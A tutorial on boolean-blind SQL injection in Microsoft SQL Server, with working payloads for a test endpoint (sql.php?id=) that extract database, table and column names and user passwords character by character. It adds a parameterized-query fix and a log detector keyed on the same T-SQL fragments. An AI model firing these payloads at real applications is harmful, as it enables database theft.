0x00 How to remember it
and 1=iif(<condition>,1,0)
When the condition is true the result is identical to the original data; when it is false no data is returned.
0x01 Base data
1> select * from article;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# Test table data: users
sql server> select * from users;
+----+--------------+----------+
| id | username | password |
+----+--------------+----------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1 |
+-----------------------+
| sa |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1 |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
0x02 Getting the data length
1> select LEN(system_user);
2> go
+---+
| |
+---+
| 2 |
+---+
(1 rows affected)
0x03 Reading the currently connected database
Web request: http://www.test.com/sql.php?id=1 and 1=iif(LEFT(db_name(),1)='t',1,0)
Database statement: select * from article where id=1 and 1=iif(LEFT(db_name(),1)='t',1,0)
# Get the first character of the current database name
# Correct case
1> select * from article where id=1 and 1=iif(LEFT(db_name(),1)='t',1,0);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
# Wrong case
1> select * from article where id=1 and 1=iif(LEFT(db_name(),1)='aaaa',1,0);
2> go
+----+-------+---------+
| id | title | content |
+----+-------+---------+
+----+-------+---------+
(0 rows affected)
# Get the second character of the current database name
# Correct case
1> select * from article where id=1 and 1=iif(LEFT(db_name(),2)='te',1,0);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
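The request `sql.php?id=1` above only works as a true/false oracle because the `id` value is spliced into the SQL text unchanged. The following is an added example, not code from the original notes: the notes never show the PHP behind `sql.php`, so `build_query_unsafe` is a hypothetical reconstruction of that string concatenation, and `build_query_safe` is the corrected form (integer validation plus a bound parameter). No database driver is involved; both functions return the SQL text and the parameter list a driver would receive, which is enough to see why the appended condition is or is not part of the query.

```python
"""Added example (not from the original notes): the unsafe query construction
that a request like sql.php?id=1 implies, next to a hardened version.

Assumptions: the notes show only the request and the resulting SQL, not the
application code, so build_query_unsafe is a hypothetical reconstruction of
string concatenation and build_query_safe is the corrected form.  No database
driver is needed: both return the SQL text plus the parameter list the driver
would receive, so the effect of an appended condition is visible directly.
"""
import re

# Constructed sample inputs: a benign id and the boolean probe from the notes.
BENIGN_ID = "1"
PROBE_ID = "1 and 1=iif(LEFT(db_name(),1)='t',1,0)"

# Number of predicates the application itself writes into the WHERE clause.
_EXPECTED_CONDITIONS = 1


def build_query_unsafe(user_id):
    """Vulnerable pattern: the raw parameter is spliced into the SQL text, so an
    appended `and 1=iif(...)` becomes a second predicate in the WHERE clause."""
    return "select * from article where id=%s" % user_id, []


def build_query_safe(user_id):
    """Hardened pattern: the value must be a plain integer and is passed as a
    bound parameter (ODBC-style `?` placeholder, as pyodbc uses for SQL Server).
    The SQL text is constant, so a parameter can never add a predicate."""
    if not re.fullmatch(r"\d{1,10}", user_id):
        raise ValueError("id must be a plain integer")
    return "select * from article where id = ?", [int(user_id)]


def safe_builder_accepts(user_id):
    """Whether the hardened builder lets this value through to the database."""
    try:
        build_query_safe(user_id)
    except ValueError:
        return False
    return True


def count_conditions(sql_text):
    """Number of predicates in the WHERE clause: 1 plus the AND/OR keywords
    found after WHERE.  Enough to expose the predicate the probe smuggles in;
    it is not a SQL parser."""
    where = sql_text.lower().split(" where ", 1)[1]
    return 1 + len(re.findall(r"\b(?:and|or)\b", where))


def probe_adds_condition(builder, user_id):
    """True when the finished SQL carries more predicates than the application wrote."""
    sql_text, _params = builder(user_id)
    return count_conditions(sql_text) > _EXPECTED_CONDITIONS


if __name__ == "__main__":
    print("unsafe:", build_query_unsafe(PROBE_ID)[0])
    print("probe adds a predicate:", probe_adds_condition(build_query_unsafe, PROBE_ID))
    print("safe builder accepts probe:", safe_builder_accepts(PROBE_ID))
    print("safe:", build_query_safe(BENIGN_ID))
```

With the bound parameter the server receives the constant text `select * from article where id = ?` and the integer 1, so there is nothing for `iif()` to evaluate. The notes also show the connection running as `sa`; parameter binding stops the condition from reaching the server at all, and a least-privileged login is the second layer that limits what any remaining injection could read.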
0x04 Guessing database names
Note: changing to db_name(1) shows the name of another database
For example:
changing to db_name(1) gives database 1
changing to db_name(2) gives database 2
Web request: http://www.test.com/sql.php?id=1 and 1=iif(LEFT(db_name(1),1)='m',1,0)
Database statement: select * from article where id=1 and 1=iif(LEFT(db_name(1),1)='m',1,0)
# Get the first character of database 1
# Correct case
1> select * from article where id=1 and 1=iif(LEFT(db_name(1),1)='m',1,0);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
# Get the second character of database 1
# Correct case
1> select * from article where id=1 and 1=iif(LEFT(db_name(1),2)='ma',1,0)
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
0x05 Guessing table names
Note:
The table_name inside OVER(Order by table_name) must be changed to a column that exists in information_schema.tables
Changing the second argument of LEFT() controls how much of the data comes out
To query a different database, do this
For example:
table_catalog=db_name() (queries the current database)
table_catalog='name of the database to query'
To query a different table, do this
For example:
change to row_number>=1
change to row_number>=2
Web request: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1),1)='a',1,0)
Database statement: select * from article where id=1 and 1=iif(LEFT((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1),1)='a',1,0)
# Get the first character of table 1 in the current database
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = iif (
LEFT (
(
SELECT
table_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 1
),
1
) = 'a',
1,
0
);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
# Get the second character of table 1 in the current database
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = iif (
LEFT (
(
SELECT
table_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 1
),
2
) = 'ar',
1,
0
);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
0x06 Guessing columns
Note:
The column_name inside OVER(Order by column_name) must be changed to a column that exists in information_schema.columns
To query a different table, do this
For example:
table_name='name of the table to query'
To query a different column, do this
For example:
change to row_number>=1
change to row_number>=2
Web request: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1),1)='i',1,0)
Database statement: select * from article where id=1 and 1=iif(LEFT((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1),1)='i',1,0)
# Get the first character of the first column of the users table in the current database
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = iif (
LEFT (
(
SELECT
column_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
column_name
FROM
information_schema.columns
WHERE
table_catalog = db_name()
AND table_name = 'users'
) AS a
WHERE
row_number = 1
),
1
) = 'i',
1,
0
);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
# Get the second character of the first column of the users table in the current database
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = iif (
LEFT (
(
SELECT
column_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
column_name
FROM
information_schema.columns
WHERE
table_catalog = db_name()
AND table_name = 'users'
) AS a
WHERE
row_number = 1
),
2
) = 'id',
1,
0
);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
0x07 Guessing contents
Note:
The username inside OVER(Order by username) must be changed to a column that exists in the users table
To get the data of a different column, change a.username in the web request
For example
The columns of the users table are: id, username, password
Because I used an alias, to get other data change it to
a.id, a.username, a.password
To query a different row, do this
For example:
change to row_number>=1
change to row_number>=2
Web request: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1),1)='t',1,0)
Database statement: select * from article where id=1 and 1=iif(LEFT((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1),1)='t',1,0)
# Query the first row of the users table, first 9 characters of the username column
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = iif (
LEFT (
(
SELECT
a.username
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 1
),
9
) = 'test-user',
1,
0
);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
# Query the second row of the users table, first 6 characters of the password column
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = iif (
LEFT (
(
SELECT
a.password
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY password) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 2
),
6
) = '234567',
1,
0
);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
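Every probe in sections 0x03 to 0x07 travels in the `id` parameter of one endpoint and leaves two fingerprints in a web server log: T-SQL fragments (`iif(`, `LEFT(`, `db_name(`, `ROW_NUMBER() OVER`, `information_schema.`) inside a parameter that should be a bare integer, and a run of requests from one client whose responses alternate between exactly two sizes (the row comes back, or nothing does). The following is an added example, not part of the original notes: detection logic run over constructed access-log lines in common log format. The endpoint name `sql.php` comes from the notes; the client addresses, timestamps and response sizes are constructed here, and the probes are URL-encoded as a browser would send them.

```python
"""Added example (not part of the original notes): detection of the boolean-blind
probes shown on this page, run over constructed web-server access-log lines.

Assumptions: common log format with the request line in quotes; the endpoint
sql.php comes from the notes, while the client addresses, timestamps, response
sizes and the log text itself are constructed for this example.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log: two normal hits from one client, then a run of the
# page's probes from another (true probe, false probe, table-name probe).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sql.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sql.php?id=2 HTTP/1.1" 200 518
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sql.php?id=1%20and%201=iif(LEFT(db_name(),1)='t',1,0) HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sql.php?id=1%20and%201=iif(LEFT(db_name(),1)='a',1,0) HTTP/1.1" 200 231
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /sql.php?id=1%20and%201=iif(LEFT((select%20table_name%20from%20(select%20ROW_NUMBER()%20OVER(Order%20by%20table_name)%20AS%20row_number,table_name%20FROM%20information_schema.tables%20where%20table_catalog=db_name())%20as%20a%20where%20row_number=1),1)='a',1,0) HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)'
)

# T-SQL fragments that occur in the probes on this page, matched case-insensitively
# against decoded parameter values.  None of them belongs in a numeric id.
SUSPICIOUS_RE = re.compile(
    r"\biif\s*\(|\bleft\s*\(|\bdb_name\s*\(|\bsystem_user\b|"
    r"\brow_number\s*\(\)\s*over\b|\binformation_schema\.|\b\d+\s*=\s*iif\b",
    re.IGNORECASE,
)


def parse_line(line):
    """Parse one access-log line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    query = urlsplit(rec["path"]).query
    # parse_qsl splits each pair on the first '=' only and percent-decodes,
    # so a value containing '=' or %20 survives intact.
    rec["params"] = dict(parse_qsl(query, keep_blank_values=True))
    return rec


def classify_param(value):
    """Suspicious fragments found in one decoded parameter value (empty if clean)."""
    return [m.group(0) for m in SUSPICIOUS_RE.finditer(value)]


def analyze(log_text):
    """Per client: request count, flagged-request count, which fragments were
    seen, and the distinct response sizes of the flagged requests."""
    per_ip = defaultdict(lambda: {"requests": 0, "suspicious": 0,
                                  "fragments": Counter(), "sizes": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stats = per_ip[rec["ip"]]
        stats["requests"] += 1
        hits = [f for v in rec["params"].values() for f in classify_param(v)]
        if hits:
            stats["suspicious"] += 1
            stats["fragments"].update(h.lower() for h in hits)
            stats["sizes"].add(int(rec["size"]))
    return dict(per_ip)


def alerts(log_text, min_suspicious=2):
    """Clients with at least min_suspicious flagged requests.  Exactly two
    distinct sizes among their flagged responses is the true/false oracle the
    notes rely on (the row comes back, or nothing comes back)."""
    out = []
    for ip, s in sorted(analyze(log_text).items()):
        if s["suspicious"] >= min_suspicious:
            out.append({"ip": ip, "suspicious": s["suspicious"],
                        "oracle_sizes": sorted(s["sizes"]),
                        "fragments": sorted(s["fragments"])})
    return out


if __name__ == "__main__":
    for alert in alerts(SAMPLE_LOG):
        print(alert)
```

The fragment list is deliberately narrow (the functions this page uses) so it produces few false positives on an integer parameter; the response-size check is what separates a genuine oracle from a single stray probe, because a blind attack needs many requests that land in exactly two size buckets. In practice the same check belongs as close to the application as possible, since a WAF that only sees keywords can be bypassed while the two-sizes pattern cannot.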